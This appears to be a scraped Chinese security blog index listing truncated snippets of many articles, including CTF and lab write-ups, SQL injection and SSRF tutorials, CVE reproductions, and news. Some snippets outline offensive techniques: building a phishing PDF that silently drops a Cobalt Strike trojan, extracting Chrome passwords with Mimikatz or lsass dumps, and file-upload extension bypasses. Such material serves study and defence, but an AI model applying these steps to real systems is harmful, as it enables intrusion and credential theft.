1.网络安全是什么网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 2.网络安全市场一、是市场需求量高； 二、则是发展相对成熟…

SIEM 解决方案的不同部署方式,如何选择SIEM 解决方案

安全信息和事件管理（SIEM）作为一种网络安全解决方案，是多种技术的融合，这些技术结合了包括安全信息管理和安全事件管理在内的流程。简单来说，SIEM 解决方案是一种重要的安全工具，它收集、存储和分析来自整个…

ARM BTI安全特性使用效果示例

以下是一个简单的ARM平台JOP利用案例，其中漏洞存在于vulnerable_func函数中： c #include <stdio.h> void vulnerable_func() { asm volatile ( "mov r0, #0\n" "pop {pc}\n" ); } int main() { …

ARM SMMU简介

ARM SMMU（System Memory Management Unit）主要用于提供外设的DMA请求的内存管理和地址转换功能。它主要处理虚拟地址与物理地址之间的映射关系，将外设的物理地址映射到系统的虚拟地址空间。在这个过程中，SMMU会根据配置的映射表将…

电子取证中Chrome各版本解密Cookies、LoginData账号密码、历史记录

文章目录 1.前置知识点2.对于80.X以前版本的解密拿masterkey的几种方法方法一直接在目标机器运行Mimikatz提取方法二转储lsass.exe 进程从内存提取masterkey方法三导出SAM注册表提取user hash 解密masterkey文件（有点麻烦不太推荐）方法四已知用户密…

SSRF攻击实例讲解

服务器端请求伪造（SSRF）攻击是一种网络安全漏洞，其中攻击者迫使受影响的服务器向攻击者指定的内部或外部系统发送请求。以下是一个SSRF攻击的实例讲解及其分析。 SSRF攻击实例当然，下面提供另外三个SSRF（服务器端请…

自学黑客（网络安全）技术——高效学习

1.网络安全是什么网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 2.网络安全市场一、是市场需求量高； 二、则是发展相对成熟…

DC-3靶场

DC-3 DC-3靶场链接：https://download.vulnhub.com/dc/DC-3-2.zip 下载后解压会有一个DC-3.ova文件，直接在vm虚拟机点击左上角打开-->文件--.选中这个.ova文件就能创建靶场，kali和靶机都调整至NAT模式首先进行主机发现： arp…

bugkuctf web随记wp

常规思路： 1，源码2，抓包3，御剑dirsearch扫后台检查是否有git文件未删除4，参数本地管理员：1，cu看源码，sci看源码有一串东西2，base64解码后是test123猜测是密码3&#x…

【sqli靶场】第四关和第五关通关思路

目录前言一、sqli靶场第四关 1.1 判断注入类型 1.2 观察报错 1.3 判断数据表中的列数 1.4 使用union联合查询 1.5 使用group_concat()函数二、sqli靶场第五关 2.1 判断注入类型 2.2 使用extractvalue函数报错 2.3 爆出数据库中的表名 2.4 爆出users表中的列名 2.5 爆出use…

【无标题】创新蓄势！安全狗多项技术获颁专利

近日，安全狗《一种网络安全监测方法、终端设备及存储介质》、《一种恶意进程风险等级评估方法、终端设备及存储介质》等多项专利顺利通过了国家知识产权局的相关审核认证，并获得了发明专利证书。厦门服云信息科技有限公司（品牌名&#xff1a…

【答案】2023年国赛信息安全管理与评估第三阶段夺旗挑战CTF（网络安全渗透）

【答案】2023年国赛信息安全管理与评估第三阶段夺旗挑战CTF（网络安全渗透） 全国职业院校技能大赛高职组信息安全管理与评估 （赛项） 评分标准第三阶段夺旗挑战CTF（网络安全渗透） *竞赛项目赛题* 本文…

CVE-2022-26923 AD CS域提权漏洞复现

文章目录一、漏洞概述二、复现1.环境及工具2.复现过程关于CA服务器的问题提示：以下是本篇文章正文内容，知识仅供学习漏洞知识一、漏洞概述当Windows系统的Active Directory证书服务（CS）在域上运行时，由于机器账号…

制作 PDF 钓鱼文件

PDF 接上文生成自解压文件准备好一个正常的 PDF 文件和 cobaltStrike 生成的木马将这两个文件使用 WinRAR 压缩选择创建自解压格式压缩文件高级 > 自解压选项，自解压路径设到 C:\\Windows\\Temp 后台运行依次添加木马和 pdf 文件 C:\\Windows\\Temp\art…

系统安全-WAF入侵防御系统测评指标

WAF（Web Application Firewall）是一种部署在web应用程序前面的安全系统，其作用是在用户请求到达web服务器之前对用户请求进行扫描和过滤，分析并校验每个用户请求的网络包，确保每个用户请求有效且安全，对无效…

basic_pentesting_1

信息收集 # nmap -sn 192.168.1.0/24 -oN live.nmap Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-11 15:19 CST Nmap scan report for 192.168.1.1 Host is up (0.00023s latency). MAC Address: 00:50:56:C0:00:08 (VMware) Nmap scan report f…

一文搞懂OSI参考模型与TCP/IP

OSI参考模型与TCP/IP 1. OSI参考模型1.1 概念1.2 数据传输过程 2. TCP/IP2.1 概念2.2 数据传输过程 3. 对应关系4. 例子4.1 发送数据包4.2 传输数据包4.3 接收数据包 1. OSI参考模型 1.1 概念 OSI模型（Open System Interconnection Reference Model）&a…

流量分析基础

定义： 流量分析（Traffic Analysis）是指对网络流量数据进行分析和解释，以获得有关网络中通信的信息和情报。这种技术可以用于网络安全、网络管理和网络优化等领域。网络流量包含了许多有关网络通信的细节信息，如源IP地…

HackTheBox - Medium - Linux - Format

Format Format 是一种中等难度的 Linux 机器，它突出显示了由解决方案的结构方式引起的安全问题。立足点涉及PHP源代码审查，发现和利用本地文件读/写漏洞，并利用Nginx中的错误配置在Redis Unix套接字上执行命令。横向移动包括浏览 Redis 数据…

社交网络分析3：社交网络隐私攻击、保护的基本概念和方法 + 去匿名化技术 + 推理攻击技术 + k-匿名 + 基于聚类的隐私保护算法

社交网络分析3：社交网络隐私攻击、保护的基本概念和方法去匿名化技术推理攻击技术 k-匿名基于聚类的隐私保护算法写在最前面社交网络隐私泄露用户数据暴露的途径复杂行为的隐私风险技术发展带来的隐私挑战经济利益与数据售卖防范措施社交网络用户数据隐私…

linux应急响应基础和常用命令

linux应急响应 linux应急响应基础和常用命令基于linux系统本身进行应急响应。系统基础信息获取获取linux服务器基本信息命令： uname -a内存cpu信息 cat /proc/cpuinfo cat /proc/meminfo lscpu free -m lsmod #查看载入的模块信息进程查看动态进程查看 …

【网络安全】网络防护之旅 - 点燃网络安全战场的数字签名烟火

🌈个人主页：Sarapines Programmer🔥 系列专栏：《网络安全之道 | 数字征程》⏰墨香寄清辞：千里传信如电光，密码奥妙似仙方。挑战黑暗剑拔弩张，网络战场誓守长。目录 😈1. 初识…

量子计算对密码学的威胁及应对方式

PrimiHub一款由密码学专家团队打造的开源隐私计算平台，专注于分享数据安全、密码学、联邦学习、同态加密等隐私计算领域的技术和内容。当量子计算机问世时，许多加密方式将慢慢失去效果。本文将阐述原因以及正在研究的后量子密码学，以帮助人们…

SQL盲注之python脚本自动化注入

SQL盲注 sql盲注无法使用sql语句注入，需要大量的判断语句或者延时注入。这样手动注入方式比较慢，手动发现注入点后可以使用python编写脚本注入。手动注入测试环境测试环境sql-libs less8中的布尔注入手动注入语句 ?id1 and length((select dat…

csrf和ssrf的区别，攻击如何防护

CSRF（跨站请求伪造）和SSRF（服务器端请求伪造）都是网络安全中的常见攻击类型，但它们的目标和攻击方式有所不同。理解这两种攻击的区别对于有效地防御它们至关重要。 CSRF和SSRF的主要区别在于攻击的发起者和目标。CSRF…

工业数据的特殊性和安全防护体系探索思考

随着工业互联网的发展，工业企业在生产运营管理过程中会产生各式各样数据，主要有研发设计数据、用户数据、生产运营数据、物流供应链数据等等，这样就形成了工业大数据，这些数据需要依赖企业的网络环境和应用系统进行内外部流通才能…

一款批量Linux应急响应检查工具

fireman简介 fireman用于在维护多台服务器并且需要定时检查服务器状态的场景下。使用自带命令可一键获取相关资源信息，排查服务器是否存在可疑用户、非法外连、文件更改等高危事件。使用 res模块用于管理资源信息添加资源编辑资源信息编写Source.yaml文件…

【网络安全】-Linux操作系统—操作系统发展历史与Linux

文章目录操作系统发展历史初期的操作系统分时操作系统个人计算机操作系统 Linux的诞生UNIX与GNU项目Linux内核的创建 Linux的特点开放源代码多样性社区支持 Linux的应用服务器和超级计算机嵌入式系统桌面系统总结操作系统发展历史操作系统（Operating System&am…

一般人想学黑客技术（网络安全），我劝你还是三思！

前言一、什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防…

蓝凌OA getLoginSessionId.html 信息泄露漏洞

文章目录产品简介漏洞概述指纹识别漏洞利用修复建议产品简介蓝凌核心产品EKP平台定位为新一代数字化生态OA平台，数字化向纵深发展，正加速构建产业互联网，对企业协作能力提出更高要求，蓝凌新一代生态型OA平台能够支撑办公数字化…

【网络安全】-Linux操作系统—VMWare软件

文章目录 VMWare软件的安装选择VMWare版本下载VMWare安装过程 VMWare的常用操作创建新的虚拟机配置虚拟机启动和关闭虚拟机安装VMWare Tools VMWare的克隆和快照克隆（Clone）快照（Snapshot） 总结 VMWare是一种流行的虚拟化软件&…

网络安全（黑客）——自学2024

1.网络安全是什么网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 2.网络安全市场一、是市场需求量高； 二、则是发展相对成熟…

Sirius：一款功能强大的通用漏洞扫描工具

关于Sirius Sirius是一款功能强大的通用漏洞扫描工具，该工具可以帮助广大研究人员在大多数场景下识别和验证应用程序中存在的安全漏洞。现如今，信息安全社区仍然是收集网络安全情报数据最佳且最有利的来源，而且社区本身的表现经常会优于商…

智能化安防与监控：全球发展、挑战与未来趋势

导言智能化安防与监控系统在全球范围内得到广泛应用，成为社会安全和公共管理的重要工具。本文将深入研究其发展历程、遇到的问题及解决过程、未来的可用范围，以及在各国的应用和未来的研究趋势，以探讨在哪些方面能取胜，并在哪些方…

移动安全APP--Frida+模拟器，模拟器+burp联动

最近测APP被通报了，问题点测得比较深，涉及到frida和burp抓包，一般在公司可能会有网络的限制，手机没办法抓包，我就直接在模拟器上试了，就在这记录一下安装过程。目录一、Frida安装二、burp与逍遥模拟器…

红队打靶练习:DIGITALWORLD.LOCAL: DEVELOPMENT

信息收集 1、arp ┌──(root㉿ru)-[~/kali] └─# arp-scan -l Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.12.128 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.12.1 00:50:56:c0:00:08 …

信息收集 - 端口

端口 -简介端口是计算机网络中用于标识特定应用程序或服务的数字标识符。当计算机之间进行通信时，数据传输通过端口进行。每个端口都有一个唯一的数字值，范围从0到65535。端口分为三类：知名端口（Well-known Ports）：范围从0到1023，这些端口通常被系统或公共服务使用。…

Apache ShenYu 网关JWT认证绕过漏洞 CVE-2021-37580

Apache ShenYu 网关JWT认证绕过漏洞 CVE-2021-37580 已亲自复现漏洞名称漏洞描述影响版本漏洞复现环境搭建漏洞利用修复建议总结 Apache ShenYu 网关JWT认证绕过漏洞 CVE-2021-37580 已亲自复现) 漏洞名称漏洞描述 Apache ShenYu是一个异步的，高性能的&#x…

思福迪Logbase运维安全管理系统test_qrcode_b接口远程命令执行漏洞漏洞复现 [附POC]

文章目录思福迪Logbase运维安全管理系统test_qrcode_b接口远程命令执行漏洞漏洞复现 [附POC]0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现0x06 修复建议思福迪Logbase运维安全管理系统test_qrcode_b接口远程命令执行漏洞漏洞…

黑客（网络安全）技术30天速成

1.网络安全是什么网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 2.网络安全市场一、是市场需求量高； 二、则是发展相对成熟…

网络安全（黑客）技术——自学2024

1.网络安全是什么网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 2.网络安全市场一、是市场需求量高； 二、则是发展相对成熟…

Windows漏洞利用开发——利用SEH绕过GS保护

实验6 Windows漏洞利用开发 6.1实验名称 Windows漏洞利用开发 6.2实验目的学习windows漏洞利用开发，使用kali linux相关工具对windows内目标程序进行漏洞利用 6.3实验步骤及内容第二阶段：利用SEH绕过GS保护了解GS编译选项，SHE异常处…

华为设备文件系统基础

华为网络设备的配置文件和VRP系统文件都保存在物理存储介质中，所以文件系统是VRP正常运行的基础。只有掌握了对文件系统的基本操作，网络工程师才能对设备的配置文件和VRP系统文件进行高效的管理。基本查询命令 VRP基于文件系统来管理设备上的文件和目录…

看了一眼“国内外最新网络安全发展动态”，头疼....

今天给大家同步一下国内外最新网络安全发展动态 ！ 国内动态： 商务部等12部门联合印发《关于加快生活服务数字化赋能的指导意见》 12月20日消息，近日，经国务院批准，商务部等12部门联合印发《关于加快生活服务数字化赋…

等级保护的基本要求（一）

目录等级保护的标准定位其他标准的关系标准适用范围标准编写思路描述模型基于安全保护能力能力目标第一级安全保护能力第二级安全保护能力第三级安全保护能力第四级安全保护能力描述模型-管理要求特点描述模型-覆盖范围特点等级保护的标准…

嘭！美国金融巨头 First American 竟遭受黑客攻击

美国第二大保险公司 First American 面临严重的网络攻击。对此，为了尽量减少此次事件的后果，部分公司系统被禁用，该公司的官方网站也暂时关闭。 First American 成立于 1889 年，专门为房地产行业提供金融和经纪服务。该公司年收入…

抖音怎么隐藏自己真实IP地址？使用代理IP可以防止IP地址b不被攻击吗？

随着互联网的普及和网络社交的盛行，越来越多的人开始关注个人隐私保护问题，其中IP地址的隐藏成为了关注的焦点之一。在抖音等网络社交平台上，很多人希望隐藏自己的真实IP地址，以保护个人隐私和安全。那么，如何隐藏自己…

[SWPUCTF 2021 新生赛]easyupload3.0

[SWPUCTF 2021 新生赛]easyupload3.0 wp 信息搜集进入页面： 看到提示了吗，没看到也没关系，分享一个文件给大家，用来测试 PHP 文件上传可好用了。 php 后缀名绕过.txt： php php2 php3 php4 php5 php6 php7 phps ph…

【网络奇缘】——奈氏准则和香农定理从理论到实践一站式服务|计算机网络

🌈个人主页: Aileen_0v0 🔥热门专栏: 华为鸿蒙系统学习|计算机网络|数据结构与算法 💫个人格言:"没有罗马,那就自己创造罗马~" 目录失真 - 信号的变化影响信号失真的因素： 编辑失真的一种现象：码间…

深信服技术认证“SCSA-S”划重点：文件上传与解析漏洞

为帮助大家更加系统化地学习网络安全知识，以及更高效地通过深信服安全服务认证工程师考核，深信服特别推出“SCSA-S认证备考秘笈”共十期内容，“考试重点”内容框架，帮助大家快速get重点知识~ 划重点来啦 *点击图片放大展示深信服…

IT安全：实时网络安全监控

了解庞大而复杂的网络环境并非易事，它需要持续观察、深入分析，并对任何违规行为做出快速反应。这就是为什么实时网络安全监控工具是任何组织 IT 安全战略的一个重要方面。网络攻击和合规性法规是 IT 安全的两个主要驱动因素。同时，数据泄露…

1.2.3 TCP/IP参考模型

一、OSI参考模型与TCP/IP参考模型 1、应用层：将表示层和会话层都纳入其中，形成一个比较大的层次，包含所有的高层协议 2、传输层：实现端到端的，进程与进程之间的通信。 3、网际层：TCP/IOP模型中最关键的部…

dvwa问题篇 -- dvwa出现数据库无法访问的时候，Could not connect to the MySQL service. -- 小黑解决教程

各位小伙伴初次玩dvwa会出现各种问题，本来想把一些问题直接总结写一篇dvwa文章来着，但因为都是关键字搜索，所以将一些问题都拆分出来，以便大家方便查类似问题。（大家有遇到不一样的问题欢迎投稿！&#xff0…

[SWPUCTF 2021 新生赛]sql

[SWPUCTF 2021 新生赛]sql wp 输入 1 正常回显： ?wllm1 返回： Want Me? Cross the Waf Your Login name:xxx Your Password:yyy输入单引号引发报错： ?wllm1 返回： Want Me? Cross the Waf You have an error in your SQL s…

网络Ping不通故障定位思路

故障分析 Ping不通是指Ping报文在网络中传输，由于各种原因（如链路故障、ARP学习失败等）而接收不到所有Ping应答报文的现象。如图1-1所示，以一个Ping不通的尝试示例，介绍Ping不通故障的定位思路。图1-1 Ping不通故…

医疗行业的信息安全现状

文章目录前言一、医疗行业相关政策法规二、“互联网+医疗健康”推进信息安全建设三、医疗行业网络安全形势依然严峻1、等级保护工作未全面开展落实2、医疗行业网络安全风险较高医疗行业网络安全隐患普遍存在遭受勒索病毒攻击严重3、安全防护水平相对落后缺乏必要的网络安全防护…

2023“楚怡杯”湖南省赛“信息安全管理与评估“--应急响应（高职组）

2023“楚怡杯”湖南省“信息安全管理与评估”（高职组）任务书 2023“楚怡杯”湖南省“信息安全管理与评估”（高职组）任务书第一阶段竞赛项目试题第二阶段竞赛项目试题网络安全事件响应：需要环境私聊博主：2023“楚怡杯”湖南省“信息安全管理与评估”（高职组）任务书第一…

防火墙内容安全特性（HCIP）

目录一、安全基本概要信息安全基本概要信息安全能力构建访问控制入侵检测系统二、安全风险 TCP/IP协议栈常见安全风险内容安全威胁挖矿/勒索黑客入侵拒绝服务攻击威胁个人安全意识薄弱带来的威胁网络攻击的趋势三、内容安全过滤技术背景 1、内容安…

thinkphp命令执行漏洞(CVE-2018-1002015)

漏洞描述： ThinkPHP 5.0.x版本和5.1.x版本中存在远程代码执行漏洞，该漏洞源于ThinkPHP在获取控制器名时未对用户提交的参数进行严格的过滤。远程攻击者可通过输入‘＼’字符的方式调用任意方法利用该漏洞执行代码。复现过程： 1…

Goby 漏洞发布｜ QNAP NAS authLogin.cgi 命令执行漏洞（CVE-2017-6361）

漏洞名称：QNAP NAS authLogin.cgi 命令执行漏洞（CVE-2017-6361） English Name：QNAP NAS authLogin.cgi command execution vulnerability (CVE-2017-6361) CVSS core: 9.8 影响资产数： 2637547 漏洞描述&#xff1…

如何应对人工智能时代下的网络与数据安全威胁

2023（第四届） 网络法治论坛 ——人工智能时代的网络与数据治理暨公益大讲堂于2023年12月23日在北方工业大学（石景山晋元庄路5号院）学生服务中心四层报告厅成功举办。网络法治论坛是在北京市法学会指导下的，由北京市网络…

网络安全复习--简答整理

-----------------------------------------------------教材如上图------------------------------------------------------------ 1.对称加密和非对称加密各有什么特点？加密解密过程中有什么区别？优点P38【考】对称加密的特点：在针对同一…

红队打靶练习:SAR: 1

目录信息收集 1、arp 2、netdiscover 3、nmap 4、nikto 5、whatweb 小结目录探测 1、gobuster 2、dirsearch WEB CMS 1、cms漏洞探索 2、RCE漏洞利用提权 get user.txt 本地提权信息收集 1、arp ┌──(root㉿ru)-[~/kali] └─# arp-scan -l Interface:…

网络安全 | 我国网络安全保险发展初期阶段的主要挑战及应对

党的二十大报告指出：“坚决维护国家安全，防范化解重大风险。 ”网络安全保险是承保于网络安全相关风险的新险种，在分散网络安全风险、弥补经济损失、优化网络安全生态等方面有基础性作用，是治理网络安全风险，维护国家…

CISSP 第1章：实现安全治理的原则和策略

作者：nothinghappend 链接：https://zhuanlan.zhihu.com/p/669881930 来源：知乎著作权归作者所有。商业转载请联系作者获得授权，非商业转载请注明出处。 CIA CIA 三性： 机密性：和数据泄露有关。完整性…

[ASIS 2019]Unicorn shop

点入题目看见四个可购买的东西，但是都购买不了，最后一个价格大的脱俗，猜测成功买到后会得到flag，但是购买时提示操作失败只允许一个字符。查看源码发现在utf-8后面特意标注提示涉及到了字符编码和字符集的概念： UTF-…

CISSP 第7章：PKI和密码学应用

第七章 PKI和密码学应用 7.1 非对称密码学对称密码系统具有共享的秘钥系统，从而产生了安全秘钥分发的问题非对称密码学使用公钥和私钥对，无需支出复杂密码分发系统 7.1.1 公钥与私钥 7.1.2 RSA（兼具加密和数字签名） RSA算法依赖…

XCTF-Misc1 USB键盘流量分析

m0_01 附件是一个USB流量文件分析 1.键盘流量 USB协议数据部分在Leftover Capture Data域中，数据长度为八个字节，其中键盘击健信息集中在第三个字节中。 usb keyboard映射表：USB协议中HID设备描述符以及键盘按键值对应编码表 2.USB…

勒索检测能力升级，亚信安全发布《勒索家族和勒索事件监控报告》

评论员简评近期(12.08-12.14)共发生勒索事件119起，相较之前呈现持平趋势。与上周相比，本周仍然流行的勒索家族为lockbit3和8base。在涉及的勒索家族中，活跃程度Top5的勒索家族分别是：lockbit3、siegedsec、dragonforce、8base和…

网络安全—模拟IP代理隐藏身份

文章目录网络拓扑安装使用代理服务器设置隐藏者设置使用古老的ccproxy实现代理服务器，仅做实验用途，禁止做违法犯罪的事情，后果自负。网络拓扑均使用Windows Server 2003系统 Router 外网IP：使用NAT模式 IP DHCP自动分配或者…

现在的人们如何看待数据隐私？

PrimiHub一款由密码学专家团队打造的开源隐私计算平台，专注于分享数据安全、密码学、联邦学习、同态加密等隐私计算领域的技术和内容。在当前时代，每一次点击、触摸或按键都留下了数字痕迹。但是我们对自己的个人数据几乎没有控制的权限，这让…

HackTheBox - Medium - Linux - Socket

Socket Socket 是一台中等难度的 Linux 机器，其特点是反转 Linux/Windows 桌面应用程序以获取其源代码，从那里发现其 Web 套接字服务中的“SQL”注入。转储数据库会显示一个哈希值，一旦破解，就会产生对该框的“SSH”访问。最后&a…

2024年全球网络安全预测报告

1.Gartner Gartners Top Strategic Predictions for 2024 and Beyond《Gartner顶级战略预测：2024年及未来》 https://www.gartner.com/en/articles/gartner-s-top-strategic-predictions-for-2024-and-beyond 2.IDC Top 10 Worldwide IT Industry 2024 Predict…

2023年广东省网络安全A模块（笔记详解）

模块A 基础设施设置与安全加固一、项目和任务描述： 假定你是某企业的网络安全工程师，对于企业的服务器系统，根据任务要求确保各服务正常运行，并通过综合运用登录和密码策略、流量完整性保护策略、事件监控策略、防火墙策略等多…

华为VRP系统基础华为ICT网络赛道

目录 1.华为VRP系统概述 3.2.命令视图与使用 3.3.基本配置命令 1.华为VRP系统概述通用路由平台VRP(Versatile Routing Platform)是华为公司数据通信产品的通用操作系统平台。它以IP业务为核心，采用组件化的体系结构，在实现丰富功能特性的同时&#x…

企业出海数据合规：GDPR中的个人数据与非个人数据之区分

GDPR仅适用于个人数据，这意味着非个人数据不在其适用范围内。因此，个人数据的定义是一个至关重要的因素，因为它决定了处理数据的实体是否要遵守该法规对数据控制者规定的各种义务。尽管如此，什么是个人数据仍然是当前数据保护制度…

年终总结——平凡又不平凡的2023

前言总结不知道该如何写起，也不知该如何建立这一篇文章的大致框架，只知道我的2023大概也就分成两大块罢了。说起2023一整年，只能用平凡而又不平凡来形容，平凡在我依旧没有什么太突出的技术点，专业水平也一直处于龟速…

软件开发和网络安全哪个更好找工作？

为什么今年应届毕业生找工作这么难？ 有时间去看看张雪峰今年为什么这么火就明白了。这么多年人才供给和需求错配的问题，在经济下行的今年，集中爆发。供给端，大学生越来越多。需求端，低端工作大家不愿去，高…

9款免费网络钓鱼模拟器详解

根据《2023年网络钓鱼状况报告》显示，自2022年第四季度至2023年第三季度，网络钓鱼电子邮件数量激增了1265%。其中，利用ChatGPT等生成式人工智能工具和聊天机器人的形式尤为突出。除了数量上的激增外，网络钓鱼攻击模式也在不断进…

信息系统安全——基于 KALI 和 Metasploit 的渗透测试

实验 2 基于 KALI 和 Metasploit 的渗透测试 2.1 实验名称《基于 KALI 和 Metasploit 的渗透测试》 2.2 实验目的 1 、熟悉渗透测试方法 2 、熟悉渗透测试工具 Kali 及 Metasploit 的使用 2.3 实验步骤及内容 1 、安装 Kali 系统 2 、选择 Kali 中 1-2 种攻击工具&#xff0c…

[NISACTF 2022]bingdundun~

[NISACTF 2022]bingdundun~ wp 信息搜集进入题目： 点一下 upload? ： 注意看上面的 URL ，此时是 ?bingdundunupload 。随便找个文件上传一下： 注意看上面的 URL ，此时变成：upload.php 。那么我有理…

【漏洞复现】Hikvision SPON IP网络对讲广播系统任意文件上传

漏洞描述 IP网络对讲广播系统是一种基于IP网络的高效、可靠、智能的通信解决方案。它支持全双工语音通信、单呼/多呼、组呼/广播等多种通信模式，可以实现跨地域、跨网络的实时通讯。该系统具有灵活的群组管理、智能化的调度和优先级控制功能，可以满足各种场景下的紧急通讯和…

【论文阅读】深度学习中的后门攻击综述

深度学习中的后门攻击综述 1.深度学习模型三种攻击范式1.1.对抗样本攻击1.2.数据投毒攻击1.3.后门攻击 2.后门攻击特点3.常用术语和标记4.常用评估指标5.攻击设置5.1.触发器5.1.1.触发器属性5.1.2.触发器类型5.1.3.攻击类型 5.2.目标类别5.3.训练方式 1.深度学习模型三种攻击范…

利用矩阵特征值解决微分方程【1】

目录一. 特征值介绍二. 单变量常微分方程三. 利用矩阵解决微分方程问题四. 小结 4.1 矩阵论 4.2 特征值与特征向量内涵 4.3 应用一. 特征值介绍线性代数有两大基础问题： 如果A为对角阵的话，那么问题就很好解决。需要注意的是，矩…

鱼哥赠书活动第⑤期：《ATTCK视角下的红蓝对抗实战指南》《智能汽车网络安全权威指南》上下册《构建新型网络形态下的网络空间安全体系》《Kali Linux高级渗透测试》

鱼哥赠书活动第⑤期： 《ATT&CK视角下的红蓝对抗实战指南》1.1介绍： 《智能汽车网络安全权威指南》上册1.1介绍： 《智能汽车网络安全权威指南》下册1.1介绍： 《构建新型网络形态下的网络空间安全体系》1.1介绍： 《K…

2023全球年度安全漏洞TOP 10 | FreeBuf 年度盘点

数字化转型步伐不断加快，社会各行业迎来了许多发展机遇，但与此同时面临着日益复杂的数据安全和网络安全威胁。其中，安全漏洞数量持续增长更是成为了各行各业不可忽视的挑战，尤其是在工业、金融、交通、国防、医疗和信息技术等领域…

BUUCTF——Reverse——reverse3

1、题目 2、工具 Exeinfo PE：查壳工具。IDA：是一款功能强大的反汇编工具，用于分析和逆向工程二进制文件。python：编写自动化脚本。base64在线解密网站：在线加密解密 - chahuo.com 3、方法下载压缩包，解…

Fuzz工具对比及使用体验

什么是FUZZ 模糊测试（Fuzz Testing）是一种自动化的测试方法，通过输入大量的随机、无效或异常数据（称为“语料集”或“测试输入”）来评估目标程序的稳定性和安全性。在软件开发的安全性和鲁棒性方面，模糊测…

【网络安全】upload靶场pass1-10思路

目录 Pass-1 Pass-2 Pass-3 Pass-4 Pass-5 Pass-6 Pass-7 Pass-8 Pass-9 Pass-10 🌈嗨！我是Filotimo__🌈。很高兴与大家相识，希望我的博客能对你有所帮助。 💡本文由Filotimo__✍️原创，首发于CSDN&#x1…

小H靶场笔记：DC-8

DC-8 January 9, 2024 3:26 PM Tags：Drupal；exim提权 Owner：只惠摸鱼信息收集 apr-scan 和 nmap 扫描C端存活主机，探测靶机ip：192.168.199.138，开放了80和22端口。扫描开放端口的服务、版本、系统、存…

网络安全—认证技术

文章目录加密认证对称密钥体制公钥密码体制公钥的加密公钥身份认证和加密鉴别码认证MAC鉴别码报文摘要认证认证加密只认证数字签名通过了解以前前辈们使用的消息认证慢慢渐进到现代的完整的认证体系。所以在学习的时候也很蒙圈，因为前期的很多技术都是有很严重…

常见网络设备及功能详解

网络设备 - 交换机交换机：距离终端用户最近的设备，用于终端用户接入网络、对数据帧进行交换等。交换机的功能： 终端设备（PC、服务器等）的网络接入二层交换（Layer 2 Switching） 网络设备 - …

文件上传靶场实战：upload-labs第1-3关

0、环境准备 0.1、安装靶场由于自己的电脑是win10系统，上传一句话木马被系统自动拦截删除，文件上传的靶场安装在win7虚拟机。把upload-labs安装包复制到老版小皮的C:\phpstudy\PHPTutorial\WWW\目录下解压，然后启用小皮，启用服…

文件上传进阶绕过技巧(一)和靶场实战

★★免责声明★★ 文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与学习之用，读者将信息做其他用途，由Ta承担全部法律及连带责任，文章作者不承担任何法律及连带责任。 0、环境准备请移步《文件上传靶场实战：upl…

Sqlmap注入参数

Sqlmap注入参数 😊😊😊😊😊😊😊🌭🌭🌭🌭🌭🌭🌭❤️❤️❤️❤️❤️❤️❤️🥨🥨&…

安全防御之可信计算技术

可信计算技术是一种计算机安全体系结构，旨在提高计算机系统在面临各种攻击和威胁时的安全性和保密性。它通过包括硬件加密、受限访问以及计算机系统本身的完整性验证等技术手段，确保计算机系统在各种攻击和威胁下保持高度安全和保密性。一、可信计算基…

网络安全新形势下的动态防御体系研究（下）

文章目录一、动态防御体系构成（一）建立对抗式威胁评估能力（二）建立安全防御效能验证能力（三）建立安全防御基准检测能力（四）建立欺骗式防御能力（五）建立安全态…

网络安全B模块（笔记详解）- 漏洞扫描与利用

漏洞扫描与利用 1.通过Kali对服务器场景server2003以半开放式不进行ping的扫描方式并配合a，要求扫描信息输出格式为xml文件格式，从生成扫描结果获取局域网（例如172.16.101.0/24）中存活靶机，以xml格式向指定文件输出信息（使用工具Nmap，使用必须要使用的参数），并将该操…

K8S后渗透横向节点与持久化隐蔽方式探索

前言通常在红蓝对抗中，我们可能会通过各种方法如弱口令、sql注入、web应用漏洞导致的RCE等方法获得服务器的权限；在当前云原生迅猛发展的时代，这台服务器很可能是一个容器，在后续的后渗透由传统的提权变为容器逃逸，内…

2023年十大零日漏洞攻击

2023年，随着勒索软件和APT组织纷纷调整攻击策略，零日漏洞攻击快速升温并有望在2024年延续这一趋势。根据谷歌威胁分析小组今年7月发布的报告，2021年野外利用零日漏洞数量（69个）创下历史新高后，2022年有所…

【心得】SSRF攻击面利用个人笔记

SSRF的利用面目录 1 任意文件读取前提是知道要读取的文件名 2 探测内网资源 3 使用gopher协议扩展攻击面 4 php原生类进行ssrf 5 ssrf绕过 1 任意文件读取前提是知道要读取的文件名 2 探测内网资源 127.0.0.1 mysql服务端监听了127.0.0.1这个地址，也就表示…

内网渗透实战攻略

🌈个人主页: Aileen_0v0 🔥热门专栏: 华为鸿蒙系统学习|计算机网络|数据结构与算法 💫个人格言:"没有罗马,那就自己创造罗马~" 目录介绍什么是内网？ 什么是内网渗透？ 内网渗透的目的： 内网…

【现代密码学】笔记3.4-3.7--构造安全加密方案、CPA安全、CCA安全《introduction to modern cryphtography》

【现代密码学】笔记3.4-3.7--构造安全加密方案、CPA安全、CCA安全《introduction to modern cryphtography》写在最前面私钥加密与伪随机性第二部分流加密与CPA多重加密 CPA安全加密方案CPA安全实验、预言机访问（oracle access） 操作模式伪随机函数PR…

